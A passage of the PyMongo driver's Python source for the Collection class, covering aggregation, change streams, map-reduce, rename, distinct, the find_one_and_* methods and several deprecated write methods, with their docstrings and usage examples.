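``db.create_collection('coll', capped=True, size=4096)``, the result
might look like:
>>> db.coll.options()
{u'capped': True, u'size': 4096}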
:Parameters:
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
.. versionchanged:: 3.6
Added ``session`` parameter.
"""
dbo = self.__database.client.get_database(
self.__database.name,
self.codec_options,
self.read_preference,
self.write_concern,
self.read_concern)
cursor = dbo.list_collections(
session=session, filter={"name": self.__name})
result = None
for doc in cursor:
result = doc
break
if not result:
return {}
options = result.get("options", {})
if "create" in options:
del options["create"]
return options
def _aggregate(self, pipeline, cursor_class, first_batch_size, session,
explicit_session, **kwargs):
common.validate_list('pipeline', pipeline)
if "explain" in kwargs:
raise ConfigurationError("The explain option is not supported. "
"Use Database.command instead.")
collation = validate_collation_or_none(kwargs.pop('collation', None))
max_await_time_ms = kwargs.pop('maxAwaitTimeMS', None)
cmd = SON([("aggregate", self.__name),
("pipeline", pipeline)])
# Remove things that are not command options.
use_cursor = True
if "useCursor" in kwargs:
warnings.warn(
"The useCursor option is deprecated "
"and will be removed in PyMongo 4.0",
DeprecationWarning, stacklevel=2)
use_cursor = common.validate_boolean(
"useCursor", kwargs.pop("useCursor"))
batch_size = common.validate_non_negative_integer_or_none(
"batchSize", kwargs.pop("batchSize", None))
# If the server does not support the "cursor" option we
# ignore useCursor and batchSize.
with self._socket_for_reads(session) as (sock_info, slave_ok):
dollar_out = pipeline and '$out' in pipeline[-1]
if use_cursor:
if "cursor" not in kwargs:
kwargs["cursor"] = {}
# Ignore batchSize when the $out pipeline stage is used.
# batchSize is meaningless in that case since the server
# doesn't return results. This also avoids SERVER-23923.
if first_batch_size is not None and not dollar_out:
kwargs["cursor"]["batchSize"] = first_batch_size
cmd.update(kwargs)
# Apply this Collection's read concern if $out is not in the
# pipeline.
if (sock_info.max_wire_version >= 4
and 'readConcern' not in cmd
and not dollar_out):
read_concern = self.read_concern
else:
read_concern = None
if 'writeConcern' not in cmd and dollar_out:
write_concern = self._write_concern_for(session)
else:
write_concern = None
# Avoid auto-injecting a session: aggregate() passes a session,
# aggregate_raw_batches() passes none.
result = sock_info.command(
self.__database.name,
cmd,
slave_ok,
self._read_preference_for(session),
self.codec_options,
parse_write_concern_error=True,
read_concern=read_concern,
write_concern=write_concern,
collation=collation,
session=session,
client=self.__database.client)
if "cursor" in result:
cursor = result["cursor"]
else:
# Pre-MongoDB 2.6 or unacknowledged write. Fake a cursor.
cursor = {
"id": 0,
"firstBatch": result.get("result", []),
"ns": self.full_name,
}
return cursor_class(
self, cursor, sock_info.address,
batch_size=batch_size or 0,
max_await_time_ms=max_await_time_ms,
session=session, explicit_session=explicit_session)
def aggregate(self, pipeline, session=None, **kwargs):
"""Perform an aggregation using the aggregation framework on this
collection.
All optional `aggregate command`_ parameters should be passed as
keyword arguments to this method. Valid options include, but are not
limited to:
- `allowDiskUse` (bool): Enables writing to temporary files. When set
to True, aggregation stages can write data to the _tmp subdirectory
of the --dbpath directory. The default is False.
- `maxTimeMS` (int): The maximum amount of time to allow the operation
to run in milliseconds.
- `batchSize` (int): The maximum number of documents to return per
batch. Ignored if the connected mongod or mongos does not support
returning aggregate results using a cursor, or `useCursor` is
``False``.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only supported
on MongoDB 3.4 and above.
- `useCursor` (bool): Deprecated. Will be removed in PyMongo 4.0.
The :meth:`aggregate` method obeys the :attr:`read_preference` of this
:class:`Collection`. Please note that using the ``$out`` pipeline stage
requires a read preference of
:attr:`~pymongo.read_preferences.ReadPreference.PRIMARY` (the default).
The server will raise an error if the ``$out`` pipeline stage is used
with any other read preference.
.. note:: This method does not support the 'explain' option. Please
use :meth:`~pymongo.database.Database.command` instead. An
example is included in the :ref:`aggregate-examples` documentation.
.. note:: The :attr:`~pymongo.collection.Collection.write_concern` of
this collection is automatically applied to this operation when using
MongoDB >= 3.4.
:Parameters:
- `pipeline`: a list of aggregation pipeline stages
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): See list of options above.
:Returns:
A :class:`~pymongo.command_cursor.CommandCursor` over the result
set.
.. versionchanged:: 3.6
Added the `session` parameter. Added the `maxAwaitTimeMS` option.
Deprecated the `useCursor` option.
.. versionchanged:: 3.4
Apply this collection's write concern automatically to this operation
when connected to MongoDB >= 3.4. Support the `collation` option.
.. versionchanged:: 3.0
The :meth:`aggregate` method always returns a CommandCursor. The
pipeline argument must be a list.
.. versionchanged:: 2.7
When the cursor option is used, return
:class:`~pymongo.command_cursor.CommandCursor` instead of
:class:`~pymongo.cursor.Cursor`.
.. versionchanged:: 2.6
Added cursor support.
.. versionadded:: 2.3
.. seealso:: :doc:`/examples/aggregation`
.. _aggregate command:
https://docs.mongodb.com/manual/reference/command/aggregate
"""
with self.__database.client._tmp_session(session, close=False) as s:
return self._aggregate(pipeline,
CommandCursor,
kwargs.get('batchSize'),
session=s,
explicit_session=session is not None,
**kwargs)
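    # A hedged usage sketch (not part of the driver): a two-stage pipeline
    # that filters then groups documents. The "db" handle, "users" collection,
    # and field names are hypothetical.
    #
    #   pipeline = [
    #       {'$match': {'status': 'active'}},
    #       {'$group': {'_id': '$city', 'total': {'$sum': 1}}},
    #   ]
    #   for doc in db.users.aggregate(pipeline, allowDiskUse=True):
    #       print(doc)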
def aggregate_raw_batches(self, pipeline, **kwargs):
"""Perform an aggregation and retrieve batches of raw BSON.
Similar to the :meth:`aggregate` method but returns a
:class:`~pymongo.cursor.RawBatchCursor`.
This example demonstrates how to work with raw batches, but in practice
raw batches should be passed to an external library that can decode
BSON into another data type, rather than used with PyMongo's
:mod:`bson` module.
>>> import bson
>>> cursor = db.test.aggregate_raw_batches([
... {'$project': {'x': {'$multiply': [2, '$x']}}}])
>>> for batch in cursor:
... print(bson.decode_all(batch))
.. note:: aggregate_raw_batches does not support sessions.
.. versionadded:: 3.6
"""
# OP_MSG with document stream returns is required to support
# sessions.
if "session" in kwargs:
raise ConfigurationError(
"aggregate_raw_batches does not support sessions")
return self._aggregate(pipeline, RawBatchCommandCursor, 0,
None, False, **kwargs)
def watch(self, pipeline=None, full_document='default', resume_after=None,
max_await_time_ms=None, batch_size=None, collation=None,
start_at_operation_time=None, session=None):
"""Watch changes on this collection.
Performs an aggregation with an implicit initial ``$changeStream``
stage and returns a
:class:`~pymongo.change_stream.CollectionChangeStream` cursor which
iterates over changes on this collection.
Introduced in MongoDB 3.6.
.. code-block:: python
with db.collection.watch() as stream:
for change in stream:
print(change)
The :class:`~pymongo.change_stream.CollectionChangeStream` iterable
blocks until the next change document is returned or an error is
raised. If the
:meth:`~pymongo.change_stream.CollectionChangeStream.next` method
encounters a network error when retrieving a batch from the server,
it will automatically attempt to recreate the cursor such that no
change events are missed. Any error encountered during the resume
attempt indicates there may be an outage and will be raised.
.. code-block:: python
try:
with db.collection.watch(
[{'$match': {'operationType': 'insert'}}]) as stream:
for insert_change in stream:
print(insert_change)
except pymongo.errors.PyMongoError:
# The ChangeStream encountered an unrecoverable error or the
# resume attempt failed to recreate the cursor.
logging.error('...')
For a precise description of the resume process see the
`change streams specification`_.
.. note:: Using this helper method is preferred to directly calling
:meth:`~pymongo.collection.Collection.aggregate` with a
``$changeStream`` stage, for the purpose of supporting
resumability.
.. warning:: This Collection's :attr:`read_concern` must be
``ReadConcern("majority")`` in order to use the ``$changeStream``
stage.
:Parameters:
- `pipeline` (optional): A list of aggregation pipeline stages to
append to an initial ``$changeStream`` stage. Not all
pipeline stages are valid after a ``$changeStream`` stage, see the
MongoDB documentation on change streams for the supported stages.
- `full_document` (optional): The fullDocument to pass as an option
to the ``$changeStream`` stage. Allowed values: 'default',
'updateLookup'. Defaults to 'default'.
When set to 'updateLookup', the change notification for partial
updates will include both a delta describing the changes to the
document, as well as a copy of the entire document that was
changed from some time after the change occurred.
- `resume_after` (optional): The logical starting point for this
change stream.
- `max_await_time_ms` (optional): The maximum time in milliseconds
for the server to wait for changes before responding to a getMore
operation.
- `batch_size` (optional): The maximum number of documents to return
per batch.
- `collation` (optional): The :class:`~pymongo.collation.Collation`
to use for the aggregation.
- `start_at_operation_time` (optional): If provided, the resulting
change stream will only return changes that occurred at or after
the specified :class:`~bson.timestamp.Timestamp`. Requires
MongoDB >= 4.0.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
A :class:`~pymongo.change_stream.CollectionChangeStream` cursor.
.. versionchanged:: 3.7
Added the ``start_at_operation_time`` parameter.
.. versionadded:: 3.6
.. mongodoc:: changeStreams
.. _change streams specification:
https://github.com/mongodb/specifications/blob/master/source/change-streams/change-streams.rst
"""
return CollectionChangeStream(
self, pipeline, full_document, resume_after, max_await_time_ms,
batch_size, collation, start_at_operation_time, session
)
def group(self, key, condition, initial, reduce, finalize=None, **kwargs):
"""Perform a query similar to an SQL *group by* operation.
**DEPRECATED** - The group command was deprecated in MongoDB 3.4. The
:meth:`~group` method is deprecated and will be removed in PyMongo 4.0.
Use :meth:`~aggregate` with the `$group` stage or :meth:`~map_reduce`
instead.
.. versionchanged:: 3.5
Deprecated the group method.
.. versionchanged:: 3.4
Added the `collation` option.
.. versionchanged:: 2.2
Removed deprecated argument: command
"""
warnings.warn("The group method is deprecated and will be removed in "
"PyMongo 4.0. Use the aggregate method with the $group "
"stage or the map_reduce method instead.",
DeprecationWarning, stacklevel=2)
group = {}
if isinstance(key, string_type):
group["$keyf"] = Code(key)
elif key is not None:
group = {"key": helpers._fields_list_to_dict(key, "key")}
group["ns"] = self.__name
group["$reduce"] = Code(reduce)
group["cond"] = condition
group["initial"] = initial
if finalize is not None:
group["finalize"] = Code(finalize)
cmd = SON([("group", group)])
collation = validate_collation_or_none(kwargs.pop('collation', None))
cmd.update(kwargs)
with self._socket_for_reads(session=None) as (sock_info, slave_ok):
return self._command(sock_info, cmd, slave_ok,
collation=collation)["retval"]
def rename(self, new_name, session=None, **kwargs):
"""Rename this collection.
If operating in auth mode, client must be authorized as an
admin to perform this operation. Raises :class:`TypeError` if
`new_name` is not an instance of :class:`basestring`
(:class:`str` in python 3). Raises :class:`~pymongo.errors.InvalidName`
if `new_name` is not a valid collection name.
:Parameters:
- `new_name`: new name for this collection
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): additional arguments to the rename command
may be passed as keyword arguments to this helper method
(i.e. ``dropTarget=True``)
.. note:: The :attr:`~pymongo.collection.Collection.write_concern` of
this collection is automatically applied to this operation when using
MongoDB >= 3.4.
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.4
Apply this collection's write concern automatically to this operation
when connected to MongoDB >= 3.4.
"""
if not isinstance(new_name, string_type):
raise TypeError("new_name must be an "
"instance of %s" % (string_type.__name__,))
if not new_name or ".." in new_name:
raise InvalidName("collection names cannot be empty")
if new_name[0] == "." or new_name[-1] == ".":
raise InvalidName("collecion names must not start or end with '.'")
if "$" in new_name and not new_name.startswith("oplog.$main"):
raise InvalidName("collection names must not contain '$'")
new_name = "%s.%s" % (self.__database.name, new_name)
cmd = SON([("renameCollection", self.__full_name), ("to", new_name)])
cmd.update(kwargs)
write_concern = self._write_concern_for_cmd(cmd, session)
with self._socket_for_writes() as sock_info:
with self.__database.client._tmp_session(session) as s:
return sock_info.command(
'admin', cmd,
write_concern=write_concern,
parse_write_concern_error=True,
session=s, client=self.__database.client)
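    # A hedged usage sketch (not part of the driver): renaming a collection
    # and dropping any existing target, per the dropTarget example in the
    # docstring. The "staging"/"production" names are hypothetical.
    #
    #   db.staging.rename('production', dropTarget=True)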
def distinct(self, key, filter=None, session=None, **kwargs):
"""Get a list of distinct values for `key` among all documents
in this collection.
Raises :class:`TypeError` if `key` is not an instance of
:class:`basestring` (:class:`str` in python 3).
All optional distinct parameters should be passed as keyword arguments
to this method. Valid options include:
- `maxTimeMS` (int): The maximum amount of time to allow the count
command to run, in milliseconds.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only supported
on MongoDB 3.4 and above.
The :meth:`distinct` method obeys the :attr:`read_preference` of
this :class:`Collection`.
:Parameters:
- `key`: name of the field for which we want to get the distinct
values
- `filter` (optional): A query document that specifies the documents
from which to retrieve the distinct values.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): See list of options above.
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.4
Support the `collation` option.
"""
if not isinstance(key, string_type):
raise TypeError("key must be an "
"instance of %s" % (string_type.__name__,))
cmd = SON([("distinct", self.__name),
("key", key)])
if filter is not None:
if "query" in kwargs:
raise ConfigurationError("can't pass both filter and query")
kwargs["query"] = filter
collation = validate_collation_or_none(kwargs.pop('collation', None))
cmd.update(kwargs)
with self._socket_for_reads(session) as (sock_info, slave_ok):
return self._command(sock_info, cmd, slave_ok,
read_concern=self.read_concern,
collation=collation, session=session)["values"]
def map_reduce(self, map, reduce, out, full_response=False, session=None,
**kwargs):
"""Perform a map/reduce operation on this collection.
If `full_response` is ``False`` (default) returns a
:class:`~pymongo.collection.Collection` instance containing
the results of the operation. Otherwise, returns the full
response from the server to the `map reduce command`_.
:Parameters:
- `map`: map function (as a JavaScript string)
- `reduce`: reduce function (as a JavaScript string)
- `out`: output collection name or `out object` (dict). See
the `map reduce command`_ documentation for available options.
Note: `out` options are order sensitive. :class:`~bson.son.SON`
can be used to specify multiple options.
e.g. SON([('replace', <collection name>), ('db', <database name>)])
- `full_response` (optional): if ``True``, return full response to
this command - otherwise just return the result collection
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): additional arguments to the
`map reduce command`_ may be passed as keyword arguments to this
helper method, e.g.::
>>> db.test.map_reduce(map, reduce, "myresults", limit=2)
.. note:: The :meth:`map_reduce` method does **not** obey the
:attr:`read_preference` of this :class:`Collection`. To run
mapReduce on a secondary use the :meth:`inline_map_reduce` method
instead.
.. note:: The :attr:`~pymongo.collection.Collection.write_concern` of
this collection is automatically applied to this operation (if the
output is not inline) when using MongoDB >= 3.4.
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.4
Apply this collection's write concern automatically to this operation
when connected to MongoDB >= 3.4.
.. seealso:: :doc:`/examples/aggregation`
.. versionchanged:: 3.4
Added the `collation` option.
.. versionchanged:: 2.2
Removed deprecated arguments: merge_output and reduce_output
.. _map reduce command: http://docs.mongodb.org/manual/reference/command/mapReduce/
.. mongodoc:: mapreduce
"""
if not isinstance(out, (string_type, abc.Mapping)):
raise TypeError("'out' must be an instance of "
"%s or a mapping" % (string_type.__name__,))
cmd = SON([("mapreduce", self.__name),
("map", map),
("reduce", reduce),
("out", out)])
collation = validate_collation_or_none(kwargs.pop('collation', None))
cmd.update(kwargs)
inline = 'inline' in cmd['out']
sock_ctx, read_pref = self._socket_for_primary_reads(session)
with sock_ctx as (sock_info, slave_ok):
if (sock_info.max_wire_version >= 4 and 'readConcern' not in cmd and
inline):
read_concern = self.read_concern
else:
read_concern = None
if 'writeConcern' not in cmd and not inline:
write_concern = self._write_concern_for(session)
else:
write_concern = None
response = self._command(
sock_info, cmd, slave_ok, read_pref,
read_concern=read_concern,
write_concern=write_concern,
collation=collation, session=session)
if full_response or not response.get('result'):
return response
elif isinstance(response['result'], dict):
dbase = response['result']['db']
coll = response['result']['collection']
return self.__database.client[dbase][coll]
else:
return self.__database[response["result"]]
def inline_map_reduce(self, map, reduce, full_response=False, session=None,
**kwargs):
"""Perform an inline map/reduce operation on this collection.
Perform the map/reduce operation on the server in RAM. A result
collection is not created. The result set is returned as a list
of documents.
If `full_response` is ``False`` (default) returns the
result documents in a list. Otherwise, returns the full
response from the server to the `map reduce command`_.
The :meth:`inline_map_reduce` method obeys the :attr:`read_preference`
of this :class:`Collection`.
:Parameters:
- `map`: map function (as a JavaScript string)
- `reduce`: reduce function (as a JavaScript string)
- `full_response` (optional): if ``True``, return full response to
this command - otherwise just return the result collection
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): additional arguments to the
`map reduce command`_ may be passed as keyword arguments to this
helper method, e.g.::
>>> db.test.inline_map_reduce(map, reduce, limit=2)
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.4
Added the `collation` option.
"""
cmd = SON([("mapreduce", self.__name),
("map", map),
("reduce", reduce),
("out", {"inline": 1})])
collation = validate_collation_or_none(kwargs.pop('collation', None))
cmd.update(kwargs)
with self._socket_for_reads(session) as (sock_info, slave_ok):
if sock_info.max_wire_version >= 4 and 'readConcern' not in cmd:
res = self._command(sock_info, cmd, slave_ok,
read_concern=self.read_concern,
collation=collation, session=session)
else:
res = self._command(sock_info, cmd, slave_ok,
collation=collation, session=session)
if full_response:
return res
else:
return res.get("results")
def _write_concern_for_cmd(self, cmd, session):
raw_wc = cmd.get('writeConcern')
if raw_wc is not None:
return WriteConcern(**raw_wc)
else:
return self._write_concern_for(session)
def __find_and_modify(self, filter, projection, sort, upsert=None,
return_document=ReturnDocument.BEFORE,
array_filters=None, session=None, **kwargs):
"""Internal findAndModify helper."""
common.validate_is_mapping("filter", filter)
if not isinstance(return_document, bool):
raise ValueError("return_document must be "
"ReturnDocument.BEFORE or ReturnDocument.AFTER")
collation = validate_collation_or_none(kwargs.pop('collation', None))
cmd = SON([("findAndModify", self.__name),
("query", filter),
("new", return_document)])
cmd.update(kwargs)
if projection is not None:
cmd["fields"] = helpers._fields_list_to_dict(projection,
"projection")
if sort is not None:
cmd["sort"] = helpers._index_document(sort)
if upsert is not None:
common.validate_boolean("upsert", upsert)
cmd["upsert"] = upsert
write_concern = self._write_concern_for_cmd(cmd, session)
def _find_and_modify(session, sock_info, retryable_write):
if array_filters is not None:
if sock_info.max_wire_version < 6:
raise ConfigurationError(
'Must be connected to MongoDB 3.6+ to use '
'arrayFilters.')
if not write_concern.acknowledged:
raise ConfigurationError(
'arrayFilters is unsupported for unacknowledged '
'writes.')
cmd["arrayFilters"] = array_filters
if (sock_info.max_wire_version >= 4 and
not write_concern.is_server_default):
cmd['writeConcern'] = write_concern.document
out = self._command(sock_info, cmd,
read_preference=ReadPreference.PRIMARY,
write_concern=write_concern,
allowable_errors=[_NO_OBJ_ERROR],
collation=collation, session=session,
retryable_write=retryable_write)
_check_write_command_response(out)
return out.get("value")
return self.__database.client._retryable_write(
write_concern.acknowledged, _find_and_modify, session)
def find_one_and_delete(self, filter,
projection=None, sort=None, session=None, **kwargs):
"""Finds a single document and deletes it, returning the document.
>>> db.test.count_documents({'x': 1})
2
>>> db.test.find_one_and_delete({'x': 1})
{u'x': 1, u'_id': ObjectId('54f4e12bfba5220aa4d6dee8')}
>>> db.test.count_documents({'x': 1})
1
If multiple documents match *filter*, a *sort* can be applied.
>>> for doc in db.test.find({'x': 1}):
... print(doc)
...
{u'x': 1, u'_id': 0}
{u'x': 1, u'_id': 1}
{u'x': 1, u'_id': 2}
>>> db.test.find_one_and_delete(
... {'x': 1}, sort=[('_id', pymongo.DESCENDING)])
{u'x': 1, u'_id': 2}
The *projection* option can be used to limit the fields returned.
>>> db.test.find_one_and_delete({'x': 1}, projection={'_id': False})
{u'x': 1}
:Parameters:
- `filter`: A query that matches the document to delete.
- `projection` (optional): a list of field names that should be
returned in the result document or a mapping specifying the fields
to include or exclude. If `projection` is a list "_id" will
always be returned. Use a mapping to exclude fields from
the result (e.g. projection={'_id': False}).
- `sort` (optional): a list of (key, direction) pairs
specifying the sort order for the query. If multiple documents
match the query, they are sorted and the first is deleted.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): additional command arguments can be passed
as keyword arguments (for example maxTimeMS can be used with
recent server versions).
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.2
Respects write concern.
.. warning:: Starting in PyMongo 3.2, this command uses the
:class:`~pymongo.write_concern.WriteConcern` of this
:class:`~pymongo.collection.Collection` when connected to MongoDB >=
3.2. Note that using an elevated write concern with this command may
be slower compared to using the default write concern.
.. versionchanged:: 3.4
Added the `collation` option.
.. versionadded:: 3.0
"""
kwargs['remove'] = True
return self.__find_and_modify(filter, projection, sort,
session=session, **kwargs)
def find_one_and_replace(self, filter, replacement,
projection=None, sort=None, upsert=False,
return_document=ReturnDocument.BEFORE,
session=None, **kwargs):
"""Finds a single document and replaces it, returning either the
original or the replaced document.
The :meth:`find_one_and_replace` method differs from
:meth:`find_one_and_update` by replacing the document matched by
*filter*, rather than modifying the existing document.
>>> for doc in db.test.find({}):
... print(doc)
...
{u'x': 1, u'_id': 0}
{u'x': 1, u'_id': 1}
{u'x': 1, u'_id': 2}
>>> db.test.find_one_and_replace({'x': 1}, {'y': 1})
{u'x': 1, u'_id': 0}
>>> for doc in db.test.find({}):
... print(doc)
...
{u'y': 1, u'_id': 0}
{u'x': 1, u'_id': 1}
{u'x': 1, u'_id': 2}
:Parameters:
- `filter`: A query that matches the document to replace.
- `replacement`: The replacement document.
- `projection` (optional): A list of field names that should be
returned in the result document or a mapping specifying the fields
to include or exclude. If `projection` is a list "_id" will
always be returned. Use a mapping to exclude fields from
the result (e.g. projection={'_id': False}).
- `sort` (optional): a list of (key, direction) pairs
specifying the sort order for the query. If multiple documents
match the query, they are sorted and the first is replaced.
- `upsert` (optional): When ``True``, inserts a new document if no
document matches the query. Defaults to ``False``.
- `return_document`: If
:attr:`ReturnDocument.BEFORE` (the default),
returns the original document before it was replaced, or ``None``
if no document matches. If
:attr:`ReturnDocument.AFTER`, returns the replaced
or inserted document.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): additional command arguments can be passed
as keyword arguments (for example maxTimeMS can be used with
recent server versions).
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.4
Added the `collation` option.
.. versionchanged:: 3.2
Respects write concern.
.. warning:: Starting in PyMongo 3.2, this command uses the
:class:`~pymongo.write_concern.WriteConcern` of this
:class:`~pymongo.collection.Collection` when connected to MongoDB >=
3.2. Note that using an elevated write concern with this command may
be slower compared to using the default write concern.
.. versionadded:: 3.0
"""
common.validate_ok_for_replace(replacement)
kwargs['update'] = replacement
return self.__find_and_modify(filter, projection,
sort, upsert, return_document,
session=session, **kwargs)
def find_one_and_update(self, filter, update,
projection=None, sort=None, upsert=False,
return_document=ReturnDocument.BEFORE,
array_filters=None, session=None, **kwargs):
"""Finds a single document and updates it, returning either the
original or the updated document.
>>> db.test.find_one_and_update(
... {'_id': 665}, {'$inc': {'count': 1}, '$set': {'done': True}})
        {u'_id': 665, u'done': False, u'count': 25}
By default :meth:`find_one_and_update` returns the original version of
the document before the update was applied. To return the updated
version of the document instead, use the *return_document* option.
>>> from pymongo import ReturnDocument
>>> db.example.find_one_and_update(
... {'_id': 'userid'},
... {'$inc': {'seq': 1}},
... return_document=ReturnDocument.AFTER)
{u'_id': u'userid', u'seq': 1}
You can limit the fields returned with the *projection* option.
>>> db.example.find_one_and_update(
... {'_id': 'userid'},
... {'$inc': {'seq': 1}},
... projection={'seq': True, '_id': False},
... return_document=ReturnDocument.AFTER)
{u'seq': 2}
The *upsert* option can be used to create the document if it doesn't
already exist.
>>> db.example.delete_many({}).deleted_count
1
>>> db.example.find_one_and_update(
... {'_id': 'userid'},
... {'$inc': {'seq': 1}},
... projection={'seq': True, '_id': False},
... upsert=True,
... return_document=ReturnDocument.AFTER)
{u'seq': 1}
If multiple documents match *filter*, a *sort* can be applied.
>>> for doc in db.test.find({'done': True}):
... print(doc)
...
{u'_id': 665, u'done': True, u'result': {u'count': 26}}
{u'_id': 701, u'done': True, u'result': {u'count': 17}}
>>> db.test.find_one_and_update(
... {'done': True},
... {'$set': {'final': True}},
... sort=[('_id', pymongo.DESCENDING)])
{u'_id': 701, u'done': True, u'result': {u'count': 17}}
:Parameters:
- `filter`: A query that matches the document to update.
- `update`: The update operations to apply.
- `projection` (optional): A list of field names that should be
returned in the result document or a mapping specifying the fields
to include or exclude. If `projection` is a list "_id" will
always be returned. Use a dict to exclude fields from
the result (e.g. projection={'_id': False}).
- `sort` (optional): a list of (key, direction) pairs
specifying the sort order for the query. If multiple documents
match the query, they are sorted and the first is updated.
- `upsert` (optional): When ``True``, inserts a new document if no
document matches the query. Defaults to ``False``.
- `return_document`: If
:attr:`ReturnDocument.BEFORE` (the default),
returns the original document before it was updated, or ``None``
if no document matches. If
:attr:`ReturnDocument.AFTER`, returns the updated
or inserted document.
- `array_filters` (optional): A list of filters specifying which
array elements an update should apply. Requires MongoDB 3.6+.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): additional command arguments can be passed
as keyword arguments (for example maxTimeMS can be used with
recent server versions).
.. versionchanged:: 3.6
Added the `array_filters` and `session` options.
.. versionchanged:: 3.4
Added the `collation` option.
.. versionchanged:: 3.2
Respects write concern.
.. warning:: Starting in PyMongo 3.2, this command uses the
:class:`~pymongo.write_concern.WriteConcern` of this
:class:`~pymongo.collection.Collection` when connected to MongoDB >=
3.2. Note that using an elevated write concern with this command may
be slower compared to using the default write concern.
.. versionadded:: 3.0
"""
common.validate_ok_for_update(update)
common.validate_list_or_none('array_filters', array_filters)
kwargs['update'] = update
return self.__find_and_modify(filter, projection,
sort, upsert, return_document,
array_filters, session=session, **kwargs)
def save(self, to_save, manipulate=True, check_keys=True, **kwargs):
"""Save a document in this collection.
**DEPRECATED** - Use :meth:`insert_one` or :meth:`replace_one` instead.
.. versionchanged:: 3.0
Removed the `safe` parameter. Pass ``w=0`` for unacknowledged write
operations.
"""
warnings.warn("save is deprecated. Use insert_one or replace_one "
"instead", DeprecationWarning, stacklevel=2)
common.validate_is_document_type("to_save", to_save)
write_concern = None
collation = validate_collation_or_none(kwargs.pop('collation', None))
if kwargs:
write_concern = WriteConcern(**kwargs)
if not (isinstance(to_save, RawBSONDocument) or "_id" in to_save):
return self._insert(
to_save, True, check_keys, manipulate, write_concern)
else:
self._update_retryable(
{"_id": to_save["_id"]}, to_save, True,
check_keys, False, manipulate, write_concern,
collation=collation)
return to_save.get("_id")
def insert(self, doc_or_docs, manipulate=True,
check_keys=True, continue_on_error=False, **kwargs):
"""Insert a document(s) into this collection.
**DEPRECATED** - Use :meth:`insert_one` or :meth:`insert_many` instead.
.. versionchanged:: 3.0
Removed the `safe` parameter. Pass ``w=0`` for unacknowledged write
operations.
"""
warnings.warn("insert is deprecated. Use insert_one or insert_many "
"instead.", DeprecationWarning, stacklevel=2)
write_concern = None
if kwargs:
write_concern = WriteConcern(**kwargs)
return self._insert(doc_or_docs, not continue_on_error,
check_keys, manipulate, write_concern)
def update(self, spec, document, upsert=False, manipulate=False,
multi=False, check_keys=True, **kwargs):
"""Update a document(s) in this collection.
**DEPRECATED** - Use :meth:`replace_one`, :meth:`update_one`, or
:meth:`update_many` instead.
.. versionchanged:: 3.0
Removed the `safe` parameter. Pass ``w=0`` for unacknowledged write
operations.
"""
warnings.warn("update is deprecated. Use replace_one, update_one or "
"update_many instead.", DeprecationWarning, stacklevel=2)
common.validate_is_mapping("spec", spec)
common.validate_is_mapping("document", document)
if document:
# If a top level key begins with '$' this is a modify operation
# and we should skip key validation. It doesn't matter which key
# we check here. Passing a document with a mix of top level keys
# starting with and without a '$' is invalid and the server will
# raise an appropriate exception.
first = next(iter(document))
if first.startswith('$'):
check_keys = False
write_concern = None
collation = validate_collation_or_none(kwargs.pop('collation', None))
if kwargs:
write_concern = WriteConcern(**kwargs)
return self._update_retryable(
spec, document, upsert, check_keys, multi, manipulate,
write_concern, collation=collation)
def remove(self, spec_or_id=None, multi=True, **kwargs):
"""Remove a document(s) from this collection.
**DEPRECATED** - Use :meth:`delete_one` or :meth:`delete_many` instead.
.. versionchanged:: 3.0
Removed the `safe` parameter. Pass ``w=0`` for unacknowledged write
operations.
"""
warnings.warn("remove is deprecated. Use delete_one or delete_many "
"instead.", DeprecationWarning, stacklevel=2)
if spec_or_id is None:
spec_or_id = {}
if not isinstance(spec_or_id, abc.Mapping):
spec_or_id = {"_id": spec_or_id}
write_concern = None
collation = validate_collation_or_none(kwargs.pop('collation', None))
if kwargs:
write_concern = WriteConcern(**kwargs)
return self._delete_retryable(
spec_or_id, multi, write_concern, collation=collation)
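    # A hedged migration sketch (not part of the driver) for the deprecation
    # above: remove() with multi=True maps to delete_many(), and with
    # multi=False to delete_one().
    #
    #   db.test.delete_many({'x': 1})
    #   db.test.delete_one({'x': 1})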
def find_and_modify(self, query={}, update=None,
upsert=False, sort=None, full_response=False,
manipulate=False, **kwargs):
"""Update and return an object.
**DEPRECATED** - Use :meth:`find_one_and_delete`,
:meth:`find_one_and_replace`, or :meth:`find_one_and_update` instead.
"""
warnings.warn("find_and_modify is deprecated, use find_one_and_delete"
", find_one_and_replace, or find_one_and_update instead",
DeprecationWarning, stacklevel=2)
if not update and not kwargs.get('remove', None):
raise ValueError("Must either update or remove")
if update and kwargs.get('remove', None):
raise ValueError("Can't do both update and remove")
# No need to include empty args
if query:
kwargs['query'] = query
if update:
kwargs['update'] = update
if upsert:
kwargs['upsert'] = upsert
if sort:
# Accept a list of tuples to match Cursor's sort parameter.
if isinstance(sort, list):
kwargs['sort'] = helpers._index_document(sort)
# Accept OrderedDict, SON, and dict with len == 1 so we
# don't break existing code already using find_and_modify.
elif (isinstance(sort, ORDERED_TYPES) or
isinstance(sort, dict) and len(sort) == 1):
warnings.warn("Passing mapping types for `sort` is deprecated,"
" use a list of (key, direction) pairs instead",
DeprecationWarning, stacklevel=2)
kwargs['sort'] = sort
else:
raise TypeError("sort must be a list of (key, direction) "
"pairs, a dict of len 1, or an instance of "
"SON or OrderedDict")
fields = kwargs.pop("fields", None)
if fields is not None:
kwargs["fields"] = helpers._fields_list_to_dict(fields, "fields")
collation = validate_collation_or_none(kwargs.pop('collation', None))
